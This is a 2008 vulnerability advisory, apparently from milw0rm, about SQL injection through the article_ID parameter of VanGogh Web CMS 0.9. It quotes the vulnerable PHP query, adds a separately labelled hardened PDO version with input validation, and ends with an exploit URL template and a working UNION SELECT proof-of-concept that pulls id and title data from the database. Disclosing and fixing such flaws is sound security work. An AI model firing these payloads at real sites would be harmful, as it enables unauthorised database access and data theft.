===================================================================
VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability
===================================================================
AUTHOR : CWH Underground
DATE : 1 July 2008
SITE : cwh.citec.us
#####################################################
APPLICATION : VanGogh Web CMS
VERSION : 0.9
VENDOR : http://vangogh.holoclan.de/
DOWNLOAD : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip
#####################################################
--- Remote SQL Injection ---
-----------------------------------
Vulnerable File (get_article.php)
-----------------------------------
@Line
337: $sql='SELECT text.content, article.lastchanged, parttypes.tag'
338: .' FROM article,T_A,text,parttypes'
339: .' WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID;
340:
341: $result=mysql_query($sql,$db) or die("$sql : Parse template Query funktioniert ned");
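
A hardened form of the query at lines 337-341, as an added example that is not part of the original advisory or of VanGogh's own code. The function names, the in-memory SQLite schema and the sample row are assumptions constructed so the example runs offline; only the table and column names come from the query quoted above.

```php
<?php
// Added example: hypothetical helper names, constructed schema and data.

// Accept article_ID only as a positive decimal integer; null means "reject".
function parse_article_id($raw): ?int
{
    if (!is_string($raw)) {            // arrays such as article_ID[]=8 are rejected
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Same SELECT as get_article.php, with the ID bound instead of concatenated.
function fetch_article_parts(PDO $pdo, int $articleId): array
{
    $stmt = $pdo->prepare(
        'SELECT text.content, article.lastchanged, parttypes.tag'
        . ' FROM article, T_A, text, parttypes'
        . ' WHERE article.ID = T_A.AID AND text.ID = T_A.TID'
        . ' AND parttypes.ID = T_A.parttype AND article.ID = :id'
    );
    $stmt->bindValue(':id', $articleId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in database (VanGogh uses MySQL; column types are guesses).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE article (ID INTEGER, lastchanged TEXT);
            CREATE TABLE text (ID INTEGER, content TEXT);
            CREATE TABLE parttypes (ID INTEGER, tag TEXT);
            CREATE TABLE T_A (AID INTEGER, TID INTEGER, parttype INTEGER);
            INSERT INTO article VALUES (8, '2008-07-01');
            INSERT INTO text VALUES (1, 'Hello');
            INSERT INTO parttypes VALUES (1, 'p');
            INSERT INTO T_A VALUES (8, 1, 1);");

// Constructed request values: one valid ID, three that must be refused.
foreach (['8', '8 OR 1=1', '0', ['8']] as $raw) {
    $id = parse_article_id($raw);
    if ($id === null) {
        echo json_encode($raw), " => rejected (answer with HTTP 400)\n";
        continue;
    }
    echo json_encode($raw), ' => ', count(fetch_article_parts($pdo, $id)), " row(s)\n";
}
```

The original `die("$sql : ...")` on line 341 also echoes the full SQL statement to the client on failure; with exception mode enabled, errors can be logged server-side and a generic message returned instead.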
---------
Exploit
---------
[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article&section=5
------
POC
------
[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article&section=5
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-07-01]